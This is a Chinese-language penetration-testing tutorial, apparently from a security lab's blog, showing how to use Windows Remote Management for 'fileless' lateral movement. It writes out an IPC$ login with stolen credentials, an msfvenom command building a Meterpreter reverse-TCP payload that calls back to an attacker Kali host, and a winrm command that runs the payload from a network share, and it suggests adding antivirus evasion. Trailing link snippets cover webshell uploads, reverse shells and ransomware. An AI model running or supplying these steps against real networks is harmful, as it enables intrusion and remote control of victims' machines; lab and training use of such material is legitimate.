利用WinRM實現內網無文件攻擊反彈shell

2021-01-16 湖南蟻景

0x00:前言

WinRM是WindowsRemoteManagementd(win遠程管理)的簡稱。基於Web服務管理(WS-Management)標準,使用80埠或者443埠。這樣一來,我們就可以在對方有設置防火牆的情況下遠程管理這臺伺服器了。

Server2008R2及往上的系統中默認中都開啟該服務,從Server2012系統後開始,該WinRM服務便被設置為默認開啟。Win7系統中卻默認安裝此WinRM服務,但是默認為禁用狀態,Win8系統和Win10系統也都默認開啟WinRM服務。

WinRM的好處在於,這種遠程連接不容易被察覺到,也不會佔用遠程連接數!

0x01:環境準備

WinRM會用到5985、5986 埠,所以防火牆必須做開放處理。用Administrator帳戶登錄攻擊機器前提知道被攻擊方的用戶登錄帳戶密碼Windows作業系統中,默認是開啟共享IPC$的IP:192.168.124.30(server2016)IP:192.168.124.20(win7)

IP:192.168.124.32(Kali)

0x02:攻擊過程

一、快速在(server2016)運行winrm

命令:winrmquickconfig

二、netuse連接(win7)

命令:netuse \\192.168.124.20\ipc$ 「密碼」/user:「用戶名

嘗試調用本地」calc.exe」.

成功

三、在(win7)中需要被遠程訪問的文件,開啟文件共享。

開啟共享文件夾,並添加訪問用戶的權限,使其能夠遠程訪問。

四、在(win7)中放置木馬,並且用(kali)接收反彈的shell

1、生成shellcode

msfvenom -pwindows/x64/meterpreter_reverse_tcp lhost=192.168.124.32 lport=7777-f exe -o ./luomiweixiong.exe

2、把」luomiweixiong.exe」放在(win7)的C盤根目錄。

3、kali啟動監聽shell模式

五、利用(server2016)的WinRM 實現內網無文件攻擊反彈shell

1、在(server2016)中執行以下命令

winrm invoke create wmicimv2/win32_process @{commandline="\\192.168.12.20\c\luomiweixiong.exe"}

反彈成功

0x03:視頻演示

因視頻無法上傳,有需要的可以留言或私信獲取哦

0x04:總結

shellcode還可以做一些免殺處理,使其更加的完美。(有待大佬們再次總結)

0x05:實操推薦(免費學習)

Kali之內網滲透:通過本實驗課學習到通過Kali如何破解WIFI密碼,利用Metasploit這個強大的滲透測試框架進行內網滲透。

搜索前往合天網安實驗室開始做實驗哦

相關焦點

  • 直接進貴司內網滲透
    這些事件中每次攻擊都有一個共同的跳板:通過一個未知設備直接連接到公司內網。在某些情況下,該設備顯示處於中央辦公室,在其他情況下是區域辦事處,有時位於另一個國家。        目前東歐至少有8家銀行成為襲擊的目標(統稱為DarkVishnya),造成數千萬美元的損失。
  • 又雙叒叕被利用:永恆之藍到底是何方神聖?!
    近日,Tellyouthepass勒索病毒被發現再次活躍,攻擊者利用了EternalBlue(永恆之藍)內網擴散模塊集成到勒索攻擊包中,實現內網蠕蟲式病毒傳播,並已對部分企業進行攻擊,如果沒有採取及時的防護措施,可能給企業帶來巨大的損失。
  • 利用python免殺cs shellcode
    0x02 概述1、什麼是shellcode在維基百科中這樣解釋道:在黑客攻擊中,shellcode是一小段代碼,用於利用軟體漏洞作為有效載荷。它之所以被稱為「shellcode」,是因為它通常啟動一個命令shell,攻擊者可以從這個命令shell控制受損的計算機,但是執行類似任務的任何代碼都可以被稱為shellcode。
  • 如何實現在WORD中打開EXCEL文件
    這種操作雖然有很多的方法,本節利用的兩種方案也或許不符合你的編程習慣,但這沒有關係,我的教程就是把我認為比較好的應用介紹給大家。讀者可以嘗試。1 利用OPEN語句完成例如,我們要實現上述界面中的第一個按鈕「打開報表」。當我們的報告讀到這裡時,我們只需點擊一下這個按鈕就可以打開我們事先設置好的文件。
  • 乾貨| 網站滲透總結之Getshell用法大全
    管理員後臺直接上傳Getshell,有時候帶密碼的Webshell連接時容易被waf攔截,可以上傳不加密的Webshell如有權限限制可以嘗試管理後臺自帶的修改文件名功能在文件名前加../來穿越目錄,如上傳的文件為a.php,將a.php修改為../a.php。
  • ShadowBroker放大招-多種Windows零日利用工具公布
    【RDP服務全球分布情況(僅為分布情況,非實際漏洞影響)】【SWIFT文件夾文件清單】洩露的數據還顯示方程式攻擊了部分銀行或機構:AI Quds Bank for Development & Investment,Qatar
  • 從Java RMI反序列化到內網淪陷
    ,主站不是這密碼,但內網其他機器是這個密碼。冰蠍連入,找到conn.asp文件翻到上面的mssql資料庫帳號sa、密碼btscxxx!123,果斷嘗試連接資料庫exec執行命令反彈powershell。![img]
  • php中函數禁用繞過的原理與利用
    反引號:最容易被忽略的點,執行命令但回顯需要配合其他函數,可以反彈shellpcntl_exec:目標機器若存在python,可用php執行python反彈shell<?x=`cat /etc/passwd > /var/www/html/success`' pop graphic-context那麼因為我們看不到回顯,所以可以考慮將結果寫入到文件中,或者直接執行反彈shell。然後如上上傳一個poc.php:<?
  • 被娛樂圈安全團隊羞辱後的Getshell(帶後續)
    是一個論壇,是 Hadsky論壇的源碼,網上搜尋了一波漏洞後無果....    phpmyadmin開始getshell咯~~,之後發現secure-file-priv為NULL,試試突破secure-file-priv寫shell。但是不知道為啥,日誌寫進去了,shell還是沒寫進去..
  • 富士康遭攻擊!黑客給出 21 天期限,索要 2.3 億贖金,否則文件都將...
    近日,據外媒報導,富士康母公司鴻海集團的墨西哥工廠被勒索軟體「DoppelPaymer」攻擊。黑客竊取了部分未加密的文件,然後加密了這些文件。黑客聲稱,除了解密鑰匙之外,沒有其他方式可以阻止這種攻擊,否則文件都將被損壞!
  • 攻防禮盒:哥斯拉Godzilla Shell管理工具
    插件模塊一些基本的模塊比如:基本信息、文件管理、命令執行我這裡就不再贅述了。資料庫管理相信大家在使用蟻劍的時候沒少碰到過連不上資料庫的情況,我自己碰到過一個環境就是shell所在的tomcat container沒有jdbc的jar包依賴導致連不上資料庫,偏偏蟻劍沒什麼好辦法。
  • Mykings殭屍網絡更新基礎設施,大量使用PowerShell腳本進行「無文件」攻擊挖礦
    1.新增IP、域名、URL;2.大量採用POWERSHELL腳本進行「無文件」落地攻擊;3.在清理競爭對手挖礦木馬名單中增加了「新冠」挖礦木馬;4.使用挖礦帳號登陸,隱藏了錢包地址;5.新增白利用文件;6.不同系統版本執行腳本不同;7.獲取windows登陸密碼。
  • 全視域洞察阻斷內網威脅,360安全衛士主防7.0構築「安全屏障」
    相比於廣撒網式的盲目攻擊,針對政府、企業等高價值目標進行精準打擊,成為當下網絡攻擊演變的新趨勢。在此其中,「橫向滲透」這種攻擊方式因為可以在滲透目標內網之後,通過各種攻擊手段以點破面,最大限度獲取目標資產的控制權,成為被眾多網絡黑客廣泛使用的「殺手鐧」。
  • 何欣榮 高少華:勒索病毒傳播警示隔離內網不能高枕無憂
    何欣榮 高少華:勒索病毒傳播警示隔離內網不能高枕無憂 每日經濟新聞 2017-05-17 00:56:13
  • BlueHero蠕蟲病毒再現最新攻擊方式
    一周前,騰訊智慧安全御見威脅情報中心披露,BlueHero蠕蟲病毒利用永恆之藍漏洞在企業區域網內傳播擴散,並利用中毒電腦組網挖礦,被安全軟體查殺後,該病毒「賊心不死」又啟用了新的攻擊手法,通過LNK漏洞加速擴散,利用企業中毒電腦組網挖取門羅幣,給企業網絡安全構成極大的威脅。
  • 「安全通告」新版「LemonDuck」搭載「永恆之藍」,新增EXE攻擊模塊...
    安全通告近日,亞信安全截獲「LemonDuck」(檸檬鴨)挖礦病毒的最新變種文件,該變種啟用Python打包可執行文件方式進行網絡攻擊,重新將永恆之藍漏洞攻擊、SMB、MSSQL爆破攻擊的代碼添加到可執行文件中,結合之前的PowerShell腳本進行混合攻擊。
  • shell腳本的使用該熟練起來了,你說呢?(篇三)
    (篇一)shell腳本的使用該熟練起來了,你說呢?(篇二)文章裡面測試的命令腳本文件,大家關注我公眾號後,可以私信我領取文件。命令格式:您可以使用echo實現更複雜的輸出格式控制。/hello_shell.sh 執行腳本,當前目錄下就會生成一個 lynfile 文件,裡面的內容為It is a test